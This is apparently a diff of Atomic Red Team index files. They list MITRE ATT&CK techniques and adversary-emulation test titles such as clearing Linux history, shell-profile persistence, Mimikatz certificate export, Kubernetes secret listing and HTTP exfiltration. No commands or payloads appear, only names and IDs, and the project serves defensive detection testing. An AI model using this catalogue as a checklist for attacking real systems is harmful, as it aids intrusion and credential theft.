+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -119,6 +126,9 @@ persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level t
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -139,12 +149,17 @@ privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Set
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
 privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1543.002,Create or Modify System Process: Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -213,6 +228,10 @@ discovery,T1201,Password Policy Discovery,1,Examine password complexity policy -
 discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
 discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
 discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
+discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
@@ -258,6 +277,12 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Inter
 execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -269,3 +294,4 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
+exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
@@ -170,6 +170,8 @@ defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applic
 defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
 defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
 defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -764,6 +766,10 @@ credential-access,T1555.003,Credentials from Password Stores: Credentials from W
 credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
 credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
@@ -846,6 +852,7 @@ discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Polici
 discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
 discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
 discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
+discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
 discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
@@ -972,6 +979,7 @@ discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d
 discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
+discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
@@ -1030,6 +1038,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
+impact,T1486,Data Encrypted for Impact,6,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
@@ -1054,7 +1063,6 @@ initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Accou
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
-exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
@@ -61,9 +61,9 @@
  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098 Account Manipulation](../../T1098/T1098.md)
-  - Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
-  - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
-  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
+  - Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
+  - Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
+  - Atomic Test #8: Azure AD - adding permission to application [azure-ad]
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1,6 +1,7 @@
 # Containers Atomic Tests by ATT&CK Tactic & Technique
 # discovery
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
+  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -13,7 +14,8 @@
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [containers]
+  - Atomic Test #1: List All Secrets [containers]
+  - Atomic Test #2: ListSecrets [containers]

 # persistence
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -17,8 +17,7 @@
  - Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
  - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
-  - Atomic Test #8: AWS - CloudWatch Log Stream Deletes [iaas:aws]
-  - Atomic Test #9: AWS CloudWatch Log Stream Deletes [iaas:aws]
+  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
 - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
@@ -300,6 +300,8 @@
  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
 - [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
  - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -332,6 +334,8 @@
  - Atomic Test #3: Set a SetGID flag on file [macos, linux]
  - Atomic Test #4: Make and modify capabilities of a binary [linux]
  - Atomic Test #5: Provide the SetUID capability to a file [linux]
+  - Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
+  - Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
 - T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -477,6 +481,11 @@
  - Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
  - Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
  - Atomic Test #38: Delete Windows Defender Scheduled Tasks [windows]
+  - Atomic Test #39: Clear History [linux]
+  - Atomic Test #40: Suspend History [linux]
+  - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
+  - Atomic Test #42: Clear Pagging Cache [linux]
+  - Atomic Test #43: Disable Memory Swap [linux]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -562,8 +571,7 @@
  - Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos]
  - Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos]
  - Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
-  - Atomic Test #8: AWS - CloudWatch Log Stream Deletes [iaas:aws]
-  - Atomic Test #9: AWS CloudWatch Log Stream Deletes [iaas:aws]
+  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
 - [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
  - Atomic Test #1: Hidden Window [windows]
 - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -810,6 +818,8 @@
  - Atomic Test #3: Set a SetGID flag on file [macos, linux]
  - Atomic Test #4: Make and modify capabilities of a binary [linux]
  - Atomic Test #5: Provide the SetUID capability to a file [linux]
+  - Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
+  - Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
 - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
  - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -902,6 +912,9 @@
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
+  - Atomic Test #3: Append to the system shell profile [linux]
+  - Atomic Test #4: Append commands user shell profile [linux]
+  - Atomic Test #5: System shell profile scripts [linux]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1097,6 +1110,12 @@
  - Atomic Test #3: Harvest SUID executable files [linux]
  - Atomic Test #4: LinEnum tool execution [linux]
  - Atomic Test #5: New script file in the tmp directory [linux]
+  - Atomic Test #6: What shell is running [linux]
+  - Atomic Test #7: What shells are available [linux]
+  - Atomic Test #8: Command line scripts [linux]
+  - Atomic Test #9: Obfuscated command line scripts [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1355,11 +1374,11 @@
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
-  - Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
-  - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
+  - Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
+  - Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
-  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
+  - Atomic Test #8: Azure AD - adding permission to application [azure-ad]
  - Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
 - [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
  - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
@@ -1386,6 +1405,9 @@
 - [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
+  - Atomic Test #3: Append to the system shell profile [linux]
+  - Atomic Test #4: Append commands user shell profile [linux]
+  - Atomic Test #5: System shell profile scripts [linux]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
 - T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1739,6 +1761,10 @@
  - Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
  - Atomic Test #6: ADFS token signing and encryption certificates theft - Local [windows]
  - Atomic Test #7: ADFS token signing and encryption certificates theft - Remote [windows]
+  - Atomic Test #8: CertUtil ExportPFX [windows]
+  - Atomic Test #9: Export Root Certificate with Export-PFXCertificate [windows]
+  - Atomic Test #10: Export Root Certificate with Export-Certificate [windows]
+  - Atomic Test #11: Export Certificates with Mimikatz [windows]
 - [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
  - Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
 - [T1003.001 OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md)
@@ -1849,8 +1875,9 @@
 - [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [containers]
-  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
+  - Atomic Test #1: List All Secrets [containers]
+  - Atomic Test #2: ListSecrets [containers]
+  - Atomic Test #3: Cat the contents of a Kubernetes service account token file [linux]
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

 # discovery
@@ -1860,7 +1887,8 @@
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
+  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1887,6 +1915,7 @@
  - Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
  - Atomic Test #15: WinPwn - generaldomaininfo [windows]
  - Atomic Test #16: Kerbrute - userenum [windows]
+  - Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
